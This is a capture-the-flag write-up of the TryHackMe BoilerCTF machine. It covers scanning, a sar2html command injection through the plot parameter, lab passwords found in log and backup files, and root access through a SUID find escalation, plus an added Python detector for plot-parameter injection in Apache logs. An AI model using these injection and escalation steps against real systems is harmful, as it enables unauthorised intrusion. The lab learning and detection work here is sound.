BoilerCTF Writeup - TryHackMe

BoilerCTF is an annoying boot2root challenge on TryHackMe. It has a lot of rabbit holes! It would definitely be an easy-to-medium level challenge if the creator hadn't put in those rabbit holes.

Enumeration

As always, I started with a port scan:

PORT      STATE SERVICE REASON  VERSION
21/tcp    open  ftp     syn-ack vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.3.43
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
10000/tcp open  http    syn-ack MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 668CB370770CC6F5682CDB936F0A3CB5
55007/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8bsvFyC4EXgZIlLR/7o9EHosUTTGJKIdjtMUyYrhUpJiEdUahT64rItJMCyO47iZTR5wkQx2H8HThHT6iQ5GlMzLGWFSTL1ttIulcg7uyXzWhJMiG/0W4HNIR44DlO8zBvysLRkBSCUEdD95kLABPKxIgCnYqfS3D73NJI6T2qWrbCTaIG5QAS5yAyPERXXz3ofHRRiCr3fYHpVopUbMTWZZDjR3DKv7IDsOCbMKSwmmgdfxDhFIBRtCkdiUdGJwP/g0uEUtHbSYsNZbc1s1a5EpaxvlESKPBainlPlRkqXdIiYuLvzsf2J0ajniPUkvJ2JbC8qm7AaDItepXLoDt
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLIDkrDNUoTTfKoucY3J3eXFICcitdce9/EOdMn8/7ZrUkM23RMsmFncOVJTkLOxOB+LwOEavTWG/pqxKLpk7oc=
|   256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPsAMyp7Cf1qf50P6K9P2n30r4MVz09NnjX7LvcKgG2p
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

I started by visiting the web server on port 80. The page was the default Apache page. I ran gobuster to find any hidden directories:

┌──(kali㉿kali)-[~]
└─$ gobuster dir --url $url --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 70               
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.135.65
[+] Method:                  GET
[+] Threads:                 70
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manual               (Status: 301) [Size: 313] [--> http://10.10.135.65/manual/]
/joomla               (Status: 301) [Size: 313] [--> http://10.10.135.65/joomla/]
/server-status        (Status: 403) [Size: 300]

We have two directories: /manual and /joomla. I visited the /joomla directory and found a Joomla website. I ran a Joomla scan using joomscan. However, there was nothing useful.

I then ran gobuster on the /joomla directory:

┌──(kali㉿kali)-[/tmp]
└─$ gobuster dir --url $url/joomla --wordlist  /usr/share/wordlists/dirb/common.txt  -t 70 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.145.140/joomla
[+] Method:                  GET
[+] Threads:                 70
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 304]
/.hta                 (Status: 403) [Size: 299]
/_test                (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/_test/]
/~www                 (Status: 301) [Size: 320] [--> http://10.10.145.140/joomla/~www/]
/administrator        (Status: 301) [Size: 329] [--> http://10.10.145.140/joomla/administrator/]
/.htpasswd            (Status: 403) [Size: 304]
/_archive             (Status: 301) [Size: 324] [--> http://10.10.145.140/joomla/_archive/]
/_files               (Status: 301) [Size: 322] [--> http://10.10.145.140/joomla/_files/]
/_database            (Status: 301) [Size: 325] [--> http://10.10.145.140/joomla/_database/]
/bin                  (Status: 301) [Size: 319] [--> http://10.10.145.140/joomla/bin/]
/build                (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/build/]
/cache                (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/cache/]
/components           (Status: 301) [Size: 326] [--> http://10.10.145.140/joomla/components/]
/images               (Status: 301) [Size: 322] [--> http://10.10.145.140/joomla/images/]
/includes             (Status: 301) [Size: 324] [--> http://10.10.145.140/joomla/includes/]
/installation         (Status: 301) [Size: 328] [--> http://10.10.145.140/joomla/installation/]
/language             (Status: 301) [Size: 324] [--> http://10.10.145.140/joomla/language/]
/layouts              (Status: 301) [Size: 323] [--> http://10.10.145.140/joomla/layouts/]
/libraries            (Status: 301) [Size: 325] [--> http://10.10.145.140/joomla/libraries/]
/media                (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/media/]
/modules              (Status: 301) [Size: 323] [--> http://10.10.145.140/joomla/modules/]
/plugins              (Status: 301) [Size: 323] [--> http://10.10.145.140/joomla/plugins/]
/index.php            (Status: 200) [Size: 12484]
/templates            (Status: 301) [Size: 325] [--> http://10.10.145.140/joomla/templates/]
/tests                (Status: 301) [Size: 321] [--> http://10.10.145.140/joomla/tests/]
/tmp                  (Status: 301) [Size: 319] [--> http://10.10.145.140/joomla/tmp/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Exploitation

I visited the _test directory, and that page redirected me to a sar2html 3.2.1 page. I ran searchsploit on sar2html and found an exploit:

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

I tried the exploit and it worked. I got a reverse shell:

$ ls
ls
index.php  log.txt  sar2html  sarFILE
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@Vulnerable:/var/www/html/joomla/_test$ ls
ls
index.php  log.txt  sar2html  sarFILE
www-data@Vulnerable:/var/www/html/joomla/_test$ cat log.txt
cat log.txt
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
www-data@Vulnerable:/var/www/html/joomla/_test$  
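The sar2html exploit above works because whatever follows a shell metacharacter in the plot parameter is run as a second command. As an added example (not code from the writeup or from sar2html), here is detection logic in Python that runs over constructed Apache access-log lines and flags requests to index.php whose decoded plot value carries such metacharacters; the log format, field names and sample lines are my own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Shell metacharacters that turn a "plot" value into a second command.
SHELL_META = re.compile(r'[;|`\n]|\$\(|&&')

# Constructed sample lines (not from the writeup): one benign sar2html request,
# three with a command appended to the plot parameter, one unrelated page.
SAMPLE_LOG = """\
10.9.3.43 - - [20/Aug/2019:11:20:01 +0000] "GET /joomla/_test/index.php?plot=sar01 HTTP/1.1" 200 12484 "-" "Mozilla/5.0"
10.9.3.43 - - [20/Aug/2019:11:20:09 +0000] "GET /joomla/_test/index.php?plot=%3Bid HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
10.9.3.43 - - [20/Aug/2019:11:20:15 +0000] "GET /joomla/_test/index.php?plot=sar01%7Cwhoami HTTP/1.1" 200 1180 "-" "curl/7.68.0"
10.9.3.43 - - [20/Aug/2019:11:20:22 +0000] "GET /joomla/_test/index.php?plot=%24%28uname+-a%29 HTTP/1.1" 200 1300 "-" "curl/7.68.0"
10.9.3.43 - - [20/Aug/2019:11:21:00 +0000] "GET /joomla/index.php HTTP/1.1" 200 12484 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the captured fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def plot_values(target):
    """Decoded values of the plot= parameter of a request target (empty list if none)."""
    parts = urlsplit(target)
    if not parts.path.endswith('/index.php'):
        return []
    return parse_qs(parts.query, keep_blank_values=True).get('plot', [])

def find_injection_attempts(log_text):
    """Flag requests whose decoded plot value carries shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for value in plot_values(rec['target']):
            if SHELL_META.search(value):
                hits.append({'ip': rec['ip'], 'ts': rec['ts'],
                             'status': rec['status'], 'payload': value})
    return hits

if __name__ == '__main__':
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} plot={hit['payload']!r}")
```

Percent-decoding happens in parse_qs, so encoded payloads such as %3B are matched the same as literal ones.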

Lateral Movement

log.txt contained the password for the user basterd. I used the password to log in via SSH:

┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -p 55007                                                                       
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

8 packages can be updated.
8 updates are security updates.


Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199
$ ls
backup.sh
$ ls -lah
total 16K
drwxr-x--- 3 basterd basterd 4.0K Aug 22  2019 .
drwxr-xr-x 4 root    root    4.0K Aug 22  2019 ..
-rwxr-xr-x 1 stoner  basterd  699 Aug 21  2019 backup.sh
-rw------- 1 basterd basterd    0 Aug 22  2019 .bash_history
drwx------ 2 basterd basterd 4.0K Aug 22  2019 .cache
$ cat backup.sh
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1know
...
...
...

Lateral Movement - 2

I found a backup script that contained the password for the user stoner. I used the password to log in via SSH:

┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -p 55007
[email protected]'s password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

8 packages can be updated.
8 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Thu Aug 22 16:05:13 2019
stoner@Vulnerable:~$

I was successfully logged in as stoner. I listed the files in the home directory:

stoner@Vulnerable:~$ ls
total 3.5M
drwxr-x--- 6 stoner stoner 4.0K May 14 01:26 .
drwxr-xr-x 4 root   root   4.0K Aug 22  2019 ..
drwx------ 2 stoner stoner 4.0K May 14 01:09 .cache
drwxr-x--- 3 stoner stoner 4.0K May 14 01:10 .config
drwx------ 2 stoner stoner 4.0K May 14 01:26 .gnupg
drwxrwxr-x 2 stoner stoner 4.0K Aug 22  2019 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21  2019 .secret

The user flag was in the .secret file.

Privilege Escalation

I checked the sudo permissions but the creator of the challenge mocked me:

stoner@Vulnerable:~$ sudo -l
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa

There’s no such file as `/NotThisTime/MessinWithYa`.

I checked ‘id’ and found that I was in the ‘lxd’ group:

stoner@Vulnerable:~$ id
uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

I tried LXD privilege escalation using this; however, it didn’t work.

Then I enumerated the system using linpeas and found that /usr/bin/find had the SUID bit set:

-r-sr-xr-x 1 root root 227K Feb  8  2016 /usr/bin/find

So we can use the find command to escalate our privileges! Haha! GO TO HELL, CHALLENGE CREATOR! LET’S ESCALATE OUR PRIVILEGES! GTFOBins to the rescue:

stoner@Vulnerable:~$ /usr/bin/find . -exec /bin/sh -p \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)

Ultimately, I got root privileges and read the root flag!

Conclusion

Though I tried and learned a lot of things, the creator of the challenge was a bit annoying. There were some unnecessary rabbit holes. I hate them!

This post is licensed under CC BY 4.0 by the author.